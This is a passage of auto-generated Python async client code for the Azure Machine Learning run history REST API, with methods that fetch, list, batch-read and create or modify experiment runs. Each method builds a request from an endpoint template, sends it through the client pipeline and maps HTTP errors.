:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PaginatedRunList or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.machinelearningservices.models.PaginatedRunList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PaginatedRunList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_get_child_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_id=experiment_id,
filter=filter,
continuationtoken=continuationtoken,
orderby=orderby,
sortorder=sortorder,
top=top,
count=count,
template_url=self.get_child_by_experiment_id.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_get_child_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_id=experiment_id,
filter=filter,
continuationtoken=continuationtoken,
orderby=orderby,
sortorder=sortorder,
top=top,
count=count,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("PaginatedRunList", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_child_by_experiment_id.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experimentids/{experimentId}/runs/{runId}/children'} # type: ignore
@distributed_trace
def get_child(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
filter: Optional[str] = None,
continuationtoken: Optional[str] = None,
orderby: Optional[List[str]] = None,
sortorder: Optional[Union[str, "_models.SortOrderDirection"]] = None,
top: Optional[int] = None,
count: Optional[bool] = None,
**kwargs: Any
) -> AsyncIterable["_models.PaginatedRunList"]:
"""get_child.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param filter: Allows for filtering the collection of resources.
The expression specified is evaluated for each resource in the collection, and only items
where the expression evaluates to true are included in the response.
:type filter: str
:param continuationtoken: The continuation token to use for getting the next set of resources.
:type continuationtoken: str
:param orderby: The list of resource properties to use for sorting the requested resources.
:type orderby: list[str]
:param sortorder: The sort order of the returned resources. Not used, specify asc or desc after
each property name in the OrderBy parameter.
:type sortorder: str or ~azure.mgmt.machinelearningservices.models.SortOrderDirection
:param top: The maximum number of items in the resource collection to be included in the
result.
If not specified, all items are returned.
:type top: int
:param count: Whether to include a count of the matching resources along with the resources
returned in the response.
:type count: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PaginatedRunList or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.machinelearningservices.models.PaginatedRunList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PaginatedRunList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_get_child_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
filter=filter,
continuationtoken=continuationtoken,
orderby=orderby,
sortorder=sortorder,
top=top,
count=count,
template_url=self.get_child.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_get_child_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
filter=filter,
continuationtoken=continuationtoken,
orderby=orderby,
sortorder=sortorder,
top=top,
count=count,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("PaginatedRunList", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_child.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/runs/{runId}/children'} # type: ignore
@distributed_trace_async
async def get_details_by_experiment_id(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_id: str,
**kwargs: Any
) -> "_models.RunDetails":
"""get_details_by_experiment_id.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param experiment_id:
:type experiment_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RunDetails, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.RunDetails
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.RunDetails"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_details_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_id=experiment_id,
template_url=self.get_details_by_experiment_id.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('RunDetails', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_details_by_experiment_id.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experimentids/{experimentId}/runs/{runId}/details'} # type: ignore
@distributed_trace_async
async def get_details_by_experiment_name(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_name: str,
**kwargs: Any
) -> "_models.RunDetails":
"""get_details_by_experiment_name.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param experiment_name:
:type experiment_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RunDetails, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.RunDetails
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.RunDetails"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_details_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_name=experiment_name,
template_url=self.get_details_by_experiment_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('RunDetails', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_details_by_experiment_name.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experiments/{experimentName}/runs/{runId}/details'} # type: ignore
@distributed_trace_async
async def get_details(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
**kwargs: Any
) -> "_models.RunDetails":
"""get_details.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RunDetails, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.RunDetails
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.RunDetails"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_details_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
template_url=self.get_details.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('RunDetails', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_details.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/runs/{runId}/details'} # type: ignore
@distributed_trace_async
async def get_run_data(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
body: Optional["_models.GetRunDataRequest"] = None,
**kwargs: Any
) -> "_models.GetRunDataResult":
"""get_run_data.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param body:
:type body: ~azure.mgmt.machinelearningservices.models.GetRunDataRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:return: GetRunDataResult, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.GetRunDataResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.GetRunDataResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'GetRunDataRequest')
else:
_json = None
request = build_get_run_data_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
content_type=content_type,
json=_json,
template_url=self.get_run_data.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('GetRunDataResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_run_data.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/rundata'} # type: ignore
@distributed_trace_async
async def batch_get_run_data(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
body: Optional["_models.BatchRequest1"] = None,
**kwargs: Any
) -> "_models.BatchResult1":
"""batch_get_run_data.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param body:
:type body: ~azure.mgmt.machinelearningservices.models.BatchRequest1
:keyword callable cls: A custom type or function that will be passed the direct response
:return: BatchResult1, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.BatchResult1
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.BatchResult1"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'BatchRequest1')
else:
_json = None
request = build_batch_get_run_data_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
content_type=content_type,
json=_json,
template_url=self.batch_get_run_data.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 207]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('BatchResult1', pipeline_response)
if response.status_code == 207:
deserialized = self._deserialize('BatchResult1', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
batch_get_run_data.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/batchrundata'} # type: ignore
@distributed_trace_async
async def batch_add_or_modify_by_experiment_id(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
experiment_id: str,
body: Optional["_models.BatchAddOrModifyRunRequest"] = None,
**kwargs: Any
) -> "_models.BatchRunResult":
"""batch_add_or_modify_by_experiment_id.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param experiment_id:
:type experiment_id: str
:param body:
:type body: ~azure.mgmt.machinelearningservices.models.BatchAddOrModifyRunRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:return: BatchRunResult, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.BatchRunResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.BatchRunResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'BatchAddOrModifyRunRequest')
else:
_json = None
request = build_batch_add_or_modify_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
experiment_id=experiment_id,
content_type=content_type,
json=_json,
template_url=self.batch_add_or_modify_by_experiment_id.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('BatchRunResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
batch_add_or_modify_by_experiment_id.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experimentids/{experimentId}/batch/runs'} # type: ignore
@distributed_trace_async
async def batch_add_or_modify_by_experiment_name(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
experiment_name: str,
body: Optional["_models.BatchAddOrModifyRunRequest"] = None,
**kwargs: Any
) -> "_models.BatchRunResult":
"""batch_add_or_modify_by_experiment_name.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param experiment_name:
:type experiment_name: str
:param body:
:type body: ~azure.mgmt.machinelearningservices.models.BatchAddOrModifyRunRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:return: BatchRunResult, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.BatchRunResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.BatchRunResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'BatchAddOrModifyRunRequest')
else:
_json = None
request = build_batch_add_or_modify_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
experiment_name=experiment_name,
content_type=content_type,
json=_json,
template_url=self.batch_add_or_modify_by_experiment_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('BatchRunResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
batch_add_or_modify_by_experiment_name.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experiments/{experimentName}/batch/runs'} # type: ignore
@distributed_trace_async
async def add_or_modify_by_experiment_name(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_name: str,
body: Optional["_models.CreateRun"] = None,
**kwargs: Any
) -> "_models.Run":
"""add_or_modify_by_experiment_name.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param experiment_name:
:type experiment_name: str
:param body:
:type body: ~azure.mgmt.machinelearningservices.models.CreateRun
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'CreateRun')
else:
_json = None
request = build_add_or_modify_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_name=experiment_name,
content_type=content_type,
json=_json,
template_url=self.add_or_modify_by_experiment_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
add_or_modify_by_experiment_name.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experiments/{experimentName}/runs/{runId}'} # type: ignore
@distributed_trace_async
async def get_by_experiment_name(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_name: str,
**kwargs: Any
) -> "_models.Run":
"""get_by_experiment_name.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param experiment_name:
:type experiment_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_by_experiment_name_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_name=experiment_name,
template_url=self.get_by_experiment_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_by_experiment_name.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experiments/{experimentName}/runs/{runId}'} # type: ignore
@distributed_trace_async
async def add_or_modify_by_experiment_id(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_id: str,
body: Optional["_models.CreateRun"] = None,
**kwargs: Any
) -> "_models.Run":
"""add_or_modify_by_experiment_id.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param experiment_id:
:type experiment_id: str
:param body:
:type body: ~azure.mgmt.machinelearningservices.models.CreateRun
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'CreateRun')
else:
_json = None
request = build_add_or_modify_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_id=experiment_id,
content_type=content_type,
json=_json,
template_url=self.add_or_modify_by_experiment_id.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
add_or_modify_by_experiment_id.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experimentids/{experimentId}/runs/{runId}'} # type: ignore
@distributed_trace_async
async def get_by_experiment_id(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
experiment_id: str,
**kwargs: Any
) -> "_models.Run":
"""get_by_experiment_id.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param experiment_id:
:type experiment_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_by_experiment_id_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
experiment_id=experiment_id,
template_url=self.get_by_experiment_id.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_by_experiment_id.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/experimentids/{experimentId}/runs/{runId}'} # type: ignore
@distributed_trace_async
async def add_or_modify_experiment(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
body: Optional["_models.CreateRun"] = None,
**kwargs: Any
) -> "_models.Run":
"""add_or_modify_experiment.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param body:
:type body: ~azure.mgmt.machinelearningservices.models.CreateRun
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'CreateRun')
else:
_json = None
request = build_add_or_modify_experiment_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
content_type=content_type,
json=_json,
template_url=self.add_or_modify_experiment.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Run', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
add_or_modify_experiment.metadata = {'url': '/history/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspaceName}/runs/{runId}'} # type: ignore
@distributed_trace_async
async def add(
self,
subscription_id: str,
resource_group_name: str,
workspace_name: str,
run_id: str,
body: Optional["_models.CreateRun"] = None,
**kwargs: Any
) -> "_models.Run":
"""add.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: The Name of the resource group in which the workspace is located.
:type resource_group_name: str
:param workspace_name: The name of the workspace.
:type workspace_name: str
:param run_id:
:type run_id: str
:param body:
:type body: ~azure.mgmt.machinelearningservices.models.CreateRun
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Run, or the result of cls(response)
:rtype: ~azure.mgmt.machinelearningservices.models.Run
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Run"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
if body is not None:
_json = self._serialize.body(body, 'CreateRun')
else:
_json = None
request = build_add_request(
subscription_id=subscription_id,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
run_id=run_id,
content_type=content_type,
json=_json,
